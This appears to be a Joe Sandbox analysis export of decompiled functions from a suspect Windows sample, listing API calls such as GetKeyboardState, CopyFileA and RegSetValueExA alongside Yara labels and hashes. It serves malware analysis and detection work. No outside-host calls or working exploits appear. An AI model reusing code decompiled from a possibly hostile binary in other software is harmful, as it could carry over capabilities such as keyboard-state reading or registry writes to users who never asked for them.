                                                    0x0043c2e3
                                                    0x0043c2e7
                                                    0x0043c2f9
                                                    0x00000000
                                                    0x0043c2f9
                                                    0x00000000
                                                    0x0043c2ef
                                                    0x0043c2c6
                                                    0x0043c2c6
                                                    0x0043c2c7
                                                    0x0043c300
                                                    0x00000000
                                                    0x0043c300
                                                    0x0043c2c9
                                                    0x0043c2ca
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c307
                                                    0x0043c30c
                                                    0x0043c310
                                                    0x00000000
                                                    0x0043c312
                                                    0x0043c312
                                                    0x0043c317
                                                    0x0043c31b
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c31f
                                                    0x0043c325
                                                    0x0043c328
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c331
                                                    0x0043c338
                                                    0x0043c346
                                                    0x0043c34d
                                                    0x0043c354
                                                    0x00000000
                                                    0x0043c360
                                                    0x00000000
                                                    0x0043c310
                                                    0x0043c2a6
                                                    0x0043c2a6
                                                    0x0043c2ab
                                                    0x0043c2b7
                                                    0x0043c2b7
                                                    0x0043c2b7
                                                    0x00000000
                                                    0x0043c2b7
                                                    0x0043c2ad
                                                    0x0043c2ad
                                                    0x0043c2b0
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c2b2
                                                    0x0043c2b5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c2b5
                                                    0x0043c25f
                                                    0x0043c266
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c275
                                                    0x0043c27d
                                                    0x00000000
                                                    0x0043c283
                                                    0x0043c212
                                                    0x0043c219
                                                    0x0043c220
                                                    0x00000000
                                                    0x0043c22e
                                                    0x0043c23d
                                                    0x0043c242
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c242
                                                    0x0043c220
                                                    0x0043c38d

                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0043C331
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardState
                                                    • String ID:
                                                    • API String ID: 1724228437-0
                                                    • Opcode ID: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                    • Instruction ID: 91b3d7ef9cae681235685cdbb9a2033184f7e3317d8ce185dcb9f17e25b61164
                                                    • Opcode Fuzzy Hash: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                    • Instruction Fuzzy Hash: 1941A131A006158FDB20DBA9C4C86AFB7A1AB0E704F1491A7E801FB3A5C738DD45C79A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004747D8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 39%
                                                    			E004747D8(char __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				void* __ecx;
				CHAR* _t11;
				struct HINSTANCE__* _t12;
				struct HRSRC__* _t13;
				void* _t29;
				intOrPtr* _t33;
				struct HINSTANCE__* _t37;
				void* _t38;
				intOrPtr _t41;
				void* _t48;
				intOrPtr _t51;

				_t48 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t51);
				_push(0x474878);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_t11 = E00404E80(_v8);
				_t12 =  *0x49e668; // 0x400000
				_t13 = FindResourceA(_t12, _t11, 0xa); // executed
				if(_t13 == 0) {
					E00404A14(_t48, 0x47488c);
				} else {
					_t37 =  *0x49e668; // 0x400000
					_t33 = E0041E0D0(_t37, 1, 0xa, _v8);
					E0040500C(_t48,  *((intOrPtr*)( *_t33))());
					_push( *((intOrPtr*)( *_t33))());
					_t29 = E00404ED8(_t48);
					_pop(_t38);
					E0041D8CC(_t33, _t38, _t29);
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(0x47487f);
				return E004049C0( &_v8);
			}















                                                    0x004747de
                                                    0x004747e0
                                                    0x004747e6
                                                    0x004747ed
                                                    0x004747ee
                                                    0x004747f3
                                                    0x004747f6
                                                    0x004747fe
                                                    0x00474804
                                                    0x0047480a
                                                    0x00474811
                                                    0x0047485d
                                                    0x00474813
                                                    0x00474819
                                                    0x0047482b
                                                    0x00474837
                                                    0x00474842
                                                    0x00474845
                                                    0x0047484e
                                                    0x0047484f
                                                    0x0047484f
                                                    0x00474864
                                                    0x00474867
                                                    0x0047486a
                                                    0x00474877

                                                    APIs
                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0047480A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindResource
                                                    • String ID:
                                                    • API String ID: 1635176832-0
                                                    • Opcode ID: eecdb2865f07ff9a271690f0d476d39d18526f90c7775773c5c6443cec6a63fb
                                                    • Instruction ID: 3aff7a426593e0292f2699da8adb463acbb462f0eeeb319a78e6b77317a5089b
                                                    • Opcode Fuzzy Hash: eecdb2865f07ff9a271690f0d476d39d18526f90c7775773c5c6443cec6a63fb
                                                    • Instruction Fuzzy Hash: 7B117074700204AFD300FBAADC5296AB3EDFB89714B51807AF508E7291DB39DD01875A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00473804 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E00473804(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _t51;
				void* _t56;
				void* _t59;
				void* _t61;

				_t61 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t56 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t59);
				_push(0x4738af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t59 + 0xfffffff0;
				if(E00409A48(_v12, _t61) != 0) {
					E00404BB8( &_v16, E00404E80(_v12));
					E00409A90(_v16, 0x80);
				}
				_t44 = E00404E80(_v12);
				CopyFileA(E00404E80(_v8), _t25, 0); // executed
				E00404BB8( &_v20, _t44);
				E00409A90(_v20, _t56);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(0x4738b6);
				return E004049E4( &_v20, 4);
			}











                                                    0x00473804
                                                    0x0047380e
                                                    0x00473811
                                                    0x00473814
                                                    0x00473816
                                                    0x00473819
                                                    0x0047381f
                                                    0x00473827
                                                    0x0047382e
                                                    0x0047382f
                                                    0x00473834
                                                    0x00473837
                                                    0x00473844
                                                    0x00473853
                                                    0x00473860
                                                    0x00473860
                                                    0x0047386f
                                                    0x0047387b
                                                    0x00473885
                                                    0x0047388f
                                                    0x00473896
                                                    0x00473899
                                                    0x0047389c
                                                    0x004738ae

                                                    APIs
                                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0047387B
                                                      • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                      • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$AttributesCopyErrorLast
                                                    • String ID:
                                                    • API String ID: 2414470624-0
                                                    • Opcode ID: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                    • Instruction ID: 249739c2ab59324f255857505799179cd9e45a8e1fd9df759088737bab44b84f
                                                    • Opcode Fuzzy Hash: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                    • Instruction Fuzzy Hash: 9C1116B0E001099BDB00EFAAD88299EB7F9FF44714F51457BF514B3391DB389E058A98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A81C Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 65%
                                                    			E0041A81C(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				intOrPtr _t15;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x49e668; // 0x400000
				}
				_t10 = FindResourceA(_t20, E00404E80(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_v8 = E0041E0D0(_t20, 1, 0xa, _t32);
					_push(_t38);
					_push(0x41a890);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_t15 = E0041DA30(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
					 *_t35 = _t15;
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(E0041A897);
					return E00403BEC(_v8);
				}
			}


















                                                    0x0041a81d
                                                    0x0041a81f
                                                    0x0041a823
                                                    0x0041a825
                                                    0x0041a827
                                                    0x0041a82b
                                                    0x0041a82d
                                                    0x0041a82d
                                                    0x0041a845
                                                    0x0041a848
                                                    0x0041a84a
                                                    0x0041a89e
                                                    0x0041a84c
                                                    0x0041a85d
                                                    0x0041a862
                                                    0x0041a863
                                                    0x0041a868
                                                    0x0041a86b
                                                    0x0041a873
                                                    0x0041a878
                                                    0x0041a87c
                                                    0x0041a87f
                                                    0x0041a882
                                                    0x0041a88f
                                                    0x0041a88f

                                                    APIs
                                                    • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A83E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindResource
                                                    • String ID:
                                                    • API String ID: 1635176832-0
                                                    • Opcode ID: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                    • Instruction ID: 3fa3efa78a76847535e85a5113efc15ba7d11e1912711d246983766bb9fbce65
                                                    • Opcode Fuzzy Hash: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                    • Instruction Fuzzy Hash: 1E014771304300ABE301EF6AEC42EAAB7ADEB88728711407EF504C7381DA79AC028258
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407A8A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E00407A8A(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t31;
				long _t38;

				_push(_t31);
				_v8 = _t31;
				_t38 = __eax;
				_t13 = E00402C0C();
				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t13);
				return _t24;
			}








                                                    0x00407a8f
                                                    0x00407a93
                                                    0x00407a98
                                                    0x00407a9a
                                                    0x00407acb
                                                    0x00407ad4
                                                    0x00407ae0

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 74274540d8a19cde7bb523b451448ef3b9ce779965eea58d91458e7d4c1449b1
                                                    • Instruction ID: a8a80a8af59d526015255caeaaeb12d1c6418dce9794d9929da9e8c0ec6d85c8
                                                    • Opcode Fuzzy Hash: 74274540d8a19cde7bb523b451448ef3b9ce779965eea58d91458e7d4c1449b1
                                                    • Instruction Fuzzy Hash: 1BF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045A28C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E0045A28C(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t40;
				char _t41;

				_push(0);
				_t37 = __edx;
				_t27 = __eax;
				_push(_t40);
				_push(0x45a30e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t40;
				_t41 =  *((char*)(__eax + 0xa4));
				if(_t41 == 0) {
					_t7 = _t27 + 0x8c; // 0x8c
					E00404A14(_t7, __edx);
				} else {
					E0045A240(__eax,  &_v8);
					E00404DCC(_v8, _t37);
					if(_t41 != 0 ||  *((intOrPtr*)(_t27 + 0x8c)) != 0) {
						SetWindowTextA( *(_t27 + 0x30), E00404E80(_t37));
						_t6 = _t27 + 0x8c; // 0x8c
						E004049C0(_t6);
					}
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E0045A315);
				return E004049C0( &_v8);
			}








                                                    0x0045a28f
                                                    0x0045a293
                                                    0x0045a295
                                                    0x0045a299
                                                    0x0045a29a
                                                    0x0045a29f
                                                    0x0045a2a2
                                                    0x0045a2a5
                                                    0x0045a2ac
                                                    0x0045a2eb
                                                    0x0045a2f3
                                                    0x0045a2ae
                                                    0x0045a2b3
                                                    0x0045a2bd
                                                    0x0045a2c2
                                                    0x0045a2d9
                                                    0x0045a2de
                                                    0x0045a2e4
                                                    0x0045a2e4
                                                    0x0045a2c2
                                                    0x0045a2fa
                                                    0x0045a2fd
                                                    0x0045a300
                                                    0x0045a30d

                                                    APIs
                                                      • Part of subcall function 0045A240: GetWindowTextA.USER32 ref: 0045A263
                                                    • SetWindowTextA.USER32(?,00000000), ref: 0045A2D9
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: TextWindow
                                                    • String ID:
                                                    • API String ID: 530164218-0
                                                    • Opcode ID: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                    • Instruction ID: 29e0112d14c0054e859a686d8a752fc0bc116d16f21071392ac3c9ea7363cd22
                                                    • Opcode Fuzzy Hash: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                    • Instruction Fuzzy Hash: E001D4B06006049BD701EB65C842B5A72A8AB88704F5042B7FD0497383D63C9D59866E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407A8C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00407A8C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00402C0C();
				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t13);
				return _t24;
			}








                                                    0x00407a93
                                                    0x00407a98
                                                    0x00407a9a
                                                    0x00407acb
                                                    0x00407ad4
                                                    0x00407ae0

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                    • Instruction ID: 8ac853332085b9bd21b4b606e16f655482de0c328e5100a7f3fe009a2cef9f92
                                                    • Opcode Fuzzy Hash: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                    • Instruction Fuzzy Hash: EDF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407AE4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00407AE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402C0C();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t12);
				return _t22;
			}








                                                    0x00407aeb
                                                    0x00407af0
                                                    0x00407af2
                                                    0x00407b21
                                                    0x00407b2a
                                                    0x00407b36

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                    • Instruction ID: 82a16aa5288589ed1fecfa95a929c264de13a72832aac3a4e9138b950186d13c
                                                    • Opcode Fuzzy Hash: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                    • Instruction Fuzzy Hash: 76F092B2704158BFDB80DE9EDD85E9B77ECEB4C264B00416ABA0CD7241D574ED108BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00432310 Relevance: 1.5, APIs: 1, Instructions: 42registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00432310(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
				char* _v8;
				char _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t11;
				long _t17;
				void* _t20;
				void* _t21;
				intOrPtr _t23;
				char _t26;

				_v8 = __ecx;
				_t26 = __edx;
				_t21 = __eax;
				_t11 = E00431D9C(_a4);
				_t27 = _t11;
				_t17 = RegSetValueExA( *(_t21 + 4), E00404E80(__edx), 0, _t11, _v8, _a8); // executed
				if(_t17 != 0) {
					_v16 = _t26;
					_v12 = 0xb;
					_t23 =  *0x49daf4; // 0x417504
					_t20 = E0040D23C(_t21, _t23, 1, _t26, _t27, 0,  &_v16);
					E00404378();
					return _t20;
				}
				return _t17;
			}
















                                                    0x00432319
                                                    0x0043231c
                                                    0x0043231e
                                                    0x00432323
                                                    0x00432328
                                                    0x00432341
                                                    0x00432348
                                                    0x0043234a
                                                    0x0043234d
                                                    0x00432357
                                                    0x00432364
                                                    0x00432369
                                                    0x00000000
                                                    0x00432369
                                                    0x00432374

                                                    APIs
                                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00432341
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                    • Instruction ID: 39d1438e57032ee4bbe9f28f00567530b1aebd0f65b6a02640603f55bb4cbe43
                                                    • Opcode Fuzzy Hash: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                    • Instruction Fuzzy Hash: 47F0A471A001087BD700EBAEDC81EAFB7EC9B49314F0040BAFA18E7391DA749D0087A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043EAF8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 51%
                                                    			E0043EAF8(intOrPtr __eax) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t14;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t27;

				_push(_t19);
				_v8 = __eax;
				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000200;
				_push(_t27);
				_push(0x43eb45);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27;
				_t14 =  *((intOrPtr*)(_v8 + 0x180));
				_push(_t14); // executed
				L00407568(); // executed
				if(_t14 == 0) {
					E0040E79C(_t18, _t19, _t23, _t24);
				}
				_pop(_t22);
				 *[fs:eax] = _t22;
				_push(0x43eb4c);
				_t16 = _v8;
				 *(_t16 + 0x54) =  *(_t16 + 0x54) & 0x0000fdff;
				return _t16;
			}













                                                    0x0043eafb
                                                    0x0043eafc
                                                    0x0043eb02
                                                    0x0043eb0a
                                                    0x0043eb0b
                                                    0x0043eb10
                                                    0x0043eb13
                                                    0x0043eb19
                                                    0x0043eb1f
                                                    0x0043eb20
                                                    0x0043eb27
                                                    0x0043eb29
                                                    0x0043eb29
                                                    0x0043eb30
                                                    0x0043eb33
                                                    0x0043eb36
                                                    0x0043eb3b
                                                    0x0043eb3e
                                                    0x0043eb44

                                                    APIs
                                                    • 733B9840.USER32(?,00000000,0043EB45), ref: 0043EB20
                                                      • Part of subcall function 0040E79C: GetLastError.KERNEL32(00000000,0040E82C), ref: 0040E7B6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B9840ErrorLast
                                                    • String ID:
                                                    • API String ID: 2743046405-0
                                                    • Opcode ID: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                    • Instruction ID: c963e65f66f93bc950c3b922f0db45755e41eff8f234a4ebd21f449329ecdab1
                                                    • Opcode Fuzzy Hash: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                    • Instruction Fuzzy Hash: 4EF03031615704EFEB16CB6ACA56D59F7E8EB0C710B6204BAF900D7691E638BD10DA18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00425A84 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00425A84(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
				int _t9;
				int _t13;
				void* _t14;
				intOrPtr _t17;

				_t14 = __eax;
				_t17 =  *0x425ac4; // 0x3
				E00425D3C(__eax, __ecx, _t17);
				 *__ecx = 0;
				__ecx->cy = 0;
				_t9 = E00404C80(__edx);
				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E00404E80(__edx), _t9, __ecx); // executed
				return _t13;
			}







                                                    0x00425a8b
                                                    0x00425a8d
                                                    0x00425a95
                                                    0x00425a9c
                                                    0x00425aa0
                                                    0x00425aa6
                                                    0x00425ab8
                                                    0x00425ac0

                                                    APIs
                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 00425AB8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExtentPoint32Text
                                                    • String ID:
                                                    • API String ID: 223599850-0
                                                    • Opcode ID: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                    • Instruction ID: 930b99cdb260b2b8a229d6862ebc98a20fe47073bc0098dbe1fe4fd8dd38ffb9
                                                    • Opcode Fuzzy Hash: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                    • Instruction Fuzzy Hash: 4AE08CB23112102B9350EB7E6C81A6BAAED8FCC225309897FF98CD3342D538DC058368
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

